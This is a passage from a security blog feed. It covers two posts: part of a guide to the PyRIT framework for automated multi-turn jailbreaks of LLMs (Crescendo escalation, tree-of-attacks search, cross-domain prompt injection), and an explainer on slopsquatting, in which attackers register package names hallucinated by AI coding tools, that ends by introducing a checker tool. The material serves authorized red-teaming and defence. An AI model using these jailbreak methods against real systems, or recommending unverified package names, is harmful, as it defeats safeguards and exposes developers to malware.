srcset="https://substackcdn.com/image/fetch/$s_!3UY0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 424w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 848w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 1272w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Orchestrators are the exploit framework.</strong> They wire targets, converters, and scorers together and drive the flow. <code>PromptSendingOrchestrator</code> is the basic spray: batch single-turn prompts through a converter stack. <code>RedTeamingOrchestrator</code> runs multi-turn conversations where an attacker LLM generates follow-ups from what the target just said. <code>CrescendoOrchestrator</code> escalates gradually across turns. <code>TreeOfAttacksWithPruningOrchestrator</code> explores multiple paths in parallel and prunes dead branches.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!qphz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!qphz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 424w, https://substackcdn.com/image/fetch/$s_!qphz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 848w, https://substackcdn.com/image/fetch/$s_!qphz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 1272w, https://substackcdn.com/image/fetch/$s_!qphz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!qphz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png" width="1136" height="254" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:254,&quot;width&quot;:1136,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:29105,&quot;alt&quot;:&quot;PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694979?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." title="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." srcset="https://substackcdn.com/image/fetch/$s_!qphz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 424w, https://substackcdn.com/image/fetch/$s_!qphz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 848w, https://substackcdn.com/image/fetch/$s_!qphz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 1272w, https://substackcdn.com/image/fetch/$s_!qphz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fffd8978e-19e1-4abe-99e2-c7b253291c4f_1136x254.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Under all of this sits a memory layer. SQLite or Azure SQL logs every prompt, every converter transform, every score. Conversation IDs. Timestamps. Raw responses. That&#8217;s our chain of custody when a Crescendo chain lands on turn six and we need to turn it into a clean bounty report.</p><h2>How Do You Run a PyRIT Campaign?</h2><p>Install is clean. Conda env, pip, done.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;4fe4c5a2-317e-437b-931f-3b81d82c30ae&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">conda create -n pyrit python=3.11 -y
conda activate pyrit
pip install pyrit
</code></pre></div><p>PyRIT runs in Jupyter notebooks, which is actually ideal. Interactive execution, inline output, a natural lab book for the campaign. Microsoft ships their entire documentation as runnable notebooks, which is either genius or annoying depending on your mood.</p><p>The simplest campaign is <code>PromptSendingOrchestrator</code>: fire a batch of prompts, apply a converter stack, score every response. Define the target (Azure OpenAI, HTTPTarget, Ollama, whatever), define a scorer with a sharp true/false description, hand it a list of prompts. PyRIT does the rest.</p><p>Think of it as Nmap before the real work. We&#8217;re mapping the surface. Which probes get through. Which get blocked. Where the filters are soft. And the real value shows up the moment we go multi-turn.</p><h2>Crescendo and TAP: Where Multi-Turn Attacks Land</h2><p>Single-turn prompt injection is 2023 energy. Frontier models got good at catching individual malicious prompts. The <a href="https://www.toxsec.com/p/dan-prompts-for-guardrail-bypass">DAN-style one-shot jailbreaks</a> that used to work now trip intent classifiers on contact. Multi-turn attacks still land. The exploit lives in the trajectory across turns, never in one message.</p><p>PyRIT&#8217;s <code>CrescendoOrchestrator</code> automates the boil-the-frog pattern. Start with an innocent question. Reference the model&#8217;s own answer. Shift the frame. By turn six, the guardrails have lost the thread. Per-message safety checks evaluate individual messages in isolation. Crescendo operates on the arc of the conversation, where no single turn looks dangerous.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;cc9b7b44-81a8-4cde-96ad-83364bf4ecba&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">from pyrit.orchestrator import CrescendoOrchestrator

orchestrator = CrescendoOrchestrator(
    objective_target=target,
    adversarial_chat=attack_llm,
    scoring_target=scoring_llm,
    max_turns=10,
    objective="[REDACTED - bounty objective]"
)

result = await orchestrator.run_attack_async(
    objective="[REDACTED]"
)
</code></pre></div><p>An adversarial LLM generates each turn from the target&#8217;s last response. The scoring target evaluates after each exchange. If the objective lands, the campaign stops and logs the winning conversation. If it hits max turns without success, we get the full transcript to analyze manually, which is often where the interesting near-misses hide.</p><p><code>TreeOfAttacksWithPruningOrchestrator</code> (TAP) takes a different shape. Instead of one thread, it explores multiple attack paths in parallel. Branches the scorer rates as progressing get expanded. Dead ends get pruned. Breadth-first search through prompt space, but cheap, because failing branches die fast.</p><p>Both patterns map directly to techniques paying out right now. Microsoft&#8217;s own AI Red Team Playground Labs use PyRIT to automate Crescendo as training exercises. OWASP lists prompt injection as LLM01:2025. The <a href="https://www.toxsec.com/p/ai-kill-chain-explained">NVIDIA AI Kill Chain</a> frames these multi-turn patterns as the hijack stage. The taxonomy is there. The tooling is there. The payouts are there.</p><p>For hunters targeting the <a href="https://www.toxsec.com/p/secure-your-mcp">agent attack surface</a> (indirect injection through tools, markdown exfiltration, MCP poisoning), PyRIT ships <code>XPIAOrchestrator</code> for cross-domain prompt injection attacks that embed malicious instructions in external data sources. Point it at the surface where agents ingest untrusted content and it runs.</p><p>The workflow flips. Instead of testing one bypass at a time in a chat tab, we define ten converter chains, twenty prompts, and let PyRIT score two hundred combinations while we go get coffee. When something scores true, we pull the transcript from memory, write the report, submit.</p><p>PyRIT doesn&#8217;t find vulnerabilities on its own. Same way Metasploit doesn&#8217;t hack anything without an operator who understands the surface. But it compresses hours of manual prompt iteration into minutes of automated campaign runs. For AI bounty work in 2026, that&#8217;s the difference between testing five ideas in a session and testing five hundred.</p><blockquote><p>Paid unlocks the unfiltered version: complete archive, private Q&amp;As, and early drops.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Frequently Asked Questions</h2><h3>Is PyRIT free to use for bug bounty hunting?</h3><p>PyRIT itself is free and open source under an MIT license. Costs come from the LLMs you wire in: Azure OpenAI credits, OpenAI API tokens, or local compute via Ollama. For bounty work, running a local model as the adversarial and scoring LLM keeps costs near zero. Only the target endpoint burns external credits, and authorized bounty targets are free to hit by definition.</p><h3>Does PyRIT work against AI agents with tool access, not just chatbots?</h3><p>Yes, via <code>XPIAOrchestrator</code> for cross-domain prompt injection that embeds malicious instructions in external data sources. This hits the indirect injection surface where agents process untrusted content from emails, documents, MCP tool returns, or RAG stores. For deeper agent-specific testing, chain PyRIT with custom targets that simulate tool-augmented workflows end to end.</p><h3>How does PyRIT compare to Garak and Promptfoo?</h3><p>Different tools, different strengths. <a href="https://www.toxsec.com/p/garak-llm-vulnerability-scanner">Garak is NVIDIA&#8217;s broad-spectrum vulnerability scanner, closer to Nmap for LLMs</a>. <a href="https://www.toxsec.com/p/promptfoo-red-teaming">Promptfoo is CI/CD-first, built for regression-testing safety layers in a pipeline</a>. PyRIT is the deep, adaptive multi-turn attack engine. Garak sweeps the surface, PyRIT runs the surgical follow-up, Promptfoo keeps patches from regressing. Together, that&#8217;s a full kill chain methodology for LLM red teaming.</p><div class="callout-block" data-callout="true"><p>ToxSec is run by a USMC veteran and Security Engineer with hands-on experience at AWS and the NSA. CISSP certified, M.S. in Cybersecurity Engineering. He covers security vulnerabilities, attack chains, and the tools defenders actually need to understand.</p></div>]]></content:encoded></item><item><title><![CDATA[What is Slopsquatting? AI Hallucinations Ship Malware]]></title><description><![CDATA[Attackers pre-register the fake package names AI coding tools invent, then wait for the copy-paste. slopcheck blocks it at the install boundary.]]></description><link>https://www.toxsec.com/p/what-is-slopsquatting-ai-hallucinations</link><guid isPermaLink="false">https://www.toxsec.com/p/what-is-slopsquatting-ai-hallucinations</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Tue, 28 Apr 2026 13:30:55 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!7GEu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!7GEu!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!7GEu!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!7GEu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:6812334,&quot;alt&quot;:&quot;Slopsquatting attack chain: AI coding assistant hallucinates a package name, attacker pre-registers it on PyPI with malware inside&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194702932?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F547a262e-3d0e-4fc1-be66-fe9f89380585_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Slopsquatting attack chain: AI coding assistant hallucinates a package name, attacker pre-registers it on PyPI with malware inside" title="Slopsquatting attack chain: AI coding assistant hallucinates a package name, attacker pre-registers it on PyPI with malware inside" srcset="https://substackcdn.com/image/fetch/$s_!7GEu!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!7GEu!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7b6d22d6-b66b-446a-b20f-1560c485a3f8_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> AI coding assistants recommend packages that don&#8217;t exist. Attackers claim those hallucinated names on PyPI and npm, load them with malware, and wait for the copy-paste. Nearly 20% of AI-generated code samples reference fake packages. 43% of those fakes repeat on every single run. The attack surface is predictable, scalable, and already burning through the wild. slopcheck blocks it at the install boundary.</p><p><a href="https://substack.com/@karenspinner1">Karen Spinner</a> is joining me for this one. She&#8217;s taking slopcheck out for a spin and showing you what it looks like from the chair of someone who codes with AI assistants daily. Her two sections live inside the piece. I handle the attack chain.</p><div><hr></div><h2>What Is Slopsquatting</h2><p>Package managers are the plumbing nobody wants to write twice. You run <code>pip install something</code>, the package drops into your project, off you go. The whole ecosystem runs on trust: you type a name, you get the code, you ship.</p><p>Now wire an AI coding assistant into the workflow. You ask Claude or Copilot for code that talks to a new API. It spits out <code>pip install huggingface-cli</code> alongside a working snippet. Most devs trust the recommendation. They run the command.</p><p>Here&#8217;s the problem. The AI never checked whether that package exists on the registry. It predicted a plausible-sounding name from statistical patterns in its training data. Sometimes the name is real. Sometimes it&#8217;s a ghost.</p><p>Slopsquatting is what happens when an attacker claims that ghost first. Register the hallucinated name on the public registry. Wire up a functional-looking README and version history. Drop a malicious install hook into the setup script. Wait.</p><p>The dev who copy-pastes the AI&#8217;s install command runs the attacker&#8217;s payload the moment <code>pip install</code> finishes. Seth Larson of the Python Software Foundation named the attack in April 2025. Slop, as in low-quality AI output. Squatting, as in claiming a name for hostile purposes. It sits inside a broader pattern of <a href="https://www.toxsec.com/p/vibe-coding-security-attack-chain">AI coding tool failures we&#8217;ve already walked through</a>, alongside hardcoded secrets and broken auth.</p><div><hr></div><h2>Why AI Coding Tools Hallucinate Packages</h2><p>Typosquatting waits for a human to mistype a name. The attacker registers `<code>reqeusts`</code>, hopes someone fat-fingers the real one, and lives off the misfires. Slopsquatting skips the human error entirely. The AI generates the mistake, the attacker harvests it.</p><p>Sixteen code-generating models tested across 576,000 samples in the 2025 USENIX Security paper <em>We Have a Package for You</em>. Nearly 20% of AI-generated code referenced packages that don&#8217;t exist. The fakes broke into three patterns: real packages mashed together (think <code>express-mongoose</code>), typo variants of real names, and pure fabrications. Over 205,000 unique hallucinated package names across all runs. That&#8217;s a shopping list.</p><p>Here&#8217;s the part that turns this from a curiosity into a weapon. Same prompt, ten runs, same model: 43% of hallucinated names appeared on every single run. An attacker doesn&#8217;t need to guess. Run a few dozen prompts against a popular model, harvest the names that keep showing up, register them on PyPI or npm before anyone else. The hallucinations are targetable.</p><p>Cross-ecosystem bleed makes it worse. Almost 9% of Python names the models hallucinated turned out to be valid JavaScript packages, and vice versa. A model thinks it&#8217;s recommending a Python library, names something that exists only in npm, and the dev runs <code>pip install</code> on a ghost. Free opening in the wrong registry.</p><p>This already works outside the lab. Researcher Bar Lanyado registered <code>huggingface-cli</code> as an empty package on PyPI after watching GPT recommend it. 30,000 downloads in three months. Alibaba copy-pasted the fake install command straight into a public repo&#8217;s README.</p><p>In January 2026, a hallucinated npm package called <code>react-codeshift</code> spread through 237 repositories via AI-generated agent skill files with nobody deliberately planting it. Slopsquatting now <a href="https://www.toxsec.com/p/distillation-raids-slopsquatting">sits alongside model distillation raids and indirect prompt injection</a> as one of the three attack vectors carving through the 2026 AI stack. Both test cases above were caught by researchers. Next time, maybe not.</p><p>Vibe coding makes the blast radius worse. Hand the entire dependency list to the model with fewer eyes on verification, and every hallucinated name is a live wire. Higher temperature pushes hallucination rates up. Creative means more slop.</p><p>Ghost packages are just one failure mode among many. <a href="https://www.toxsec.com/p/why-vibe-coding-leaks-your-secrets">Hardcoded secrets in AI-generated code</a> ship the credentials. The registry is the next door over.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!5Z3Y!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 424w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 848w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 1272w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png" width="1174" height="906" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:906,&quot;width&quot;:1174,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:83781,&quot;alt&quot;:&quot;Slopsquatting hallucination rates from USENIX 2025 research &#8212; bar chart showing 20% of AI-generated code references fake packages, 43% of hallucinations repeat across runs, 9% cross-ecosystem bleed.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/194702932?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Slopsquatting hallucination rates from USENIX 2025 research &#8212; bar chart showing 20% of AI-generated code references fake packages, 43% of hallucinations repeat across runs, 9% cross-ecosystem bleed." title="Slopsquatting hallucination rates from USENIX 2025 research &#8212; bar chart showing 20% of AI-generated code references fake packages, 43% of hallucinations repeat across runs, 9% cross-ecosystem bleed." srcset="https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 424w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 848w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 1272w, https://substackcdn.com/image/fetch/$s_!5Z3Y!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F50321590-789b-4a82-8757-b79d1f743ff3_1174x906.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h2>So what do you actually do about Slopsquatting?</h2><p>That&#8217;s where slopcheck comes in. It&#8217;s an open-source CLI I built to sit at the install boundary and check every dependency name against the real registry before pip or npm ever fires. If the package doesn&#8217;t exist, it blocks. If it looks sketchy (brand new, zero downloads, hallucination-pattern naming), it flags. If it&#8217;s clean, it lets you through. Seven ecosystems, runs in under a second, MIT licensed.</p><p>Full technical breakdown is coming up after Karen&#8217;s section. But first, she took it for a spin on her own projects. Here&#8217;s what that looked like from the chair of someone who actually has to trust the install command.</p><div><hr></div><p><em>Karen Spinner, taking slopcheck for a spin:</em></p><h3>Catching AI Package Hallucinations Before They Bite</h3><p>When I use vibe coding tools like Claude Code, my overall approach is &#8220;trust but verify.&#8221; I personally look at the code and make sure I know what it&#8217;s doing before I ship it. And I always keep security in mind as I build.</p><p>Coding agents are designed to do what&#8217;s fast and expedient, not necessarily what&#8217;s best for you and your users. And slopsquatting exploits this behavior. If AI agents would look up tool names instead of guessing, it wouldn&#8217;t exist.</p><p>But since it does exist, the best approach is to check package names before AI installs them in your project. Doing this manually can be a hassle and force you to switch context in the middle of your building session.</p><p>Chris&#8217; slopcheck tool is a convenient way to automate this process. It reads your dependency files as text and checks each package against the real registries over HTTP.</p><p><strong>Setting it up</strong></p><p>While slopcheck is a Python CLI, it scans across ecosystems, PyPI, npm, crates.io, Go, RubyGems, Maven, and Packagist. I installed it one of my Python virtual environments in about ten seconds:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;bash&quot;,&quot;nodeId&quot;:&quot;8fb40d37-56f7-4714-aae2-229abe72a2a4&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-bash">pip install slopcheck
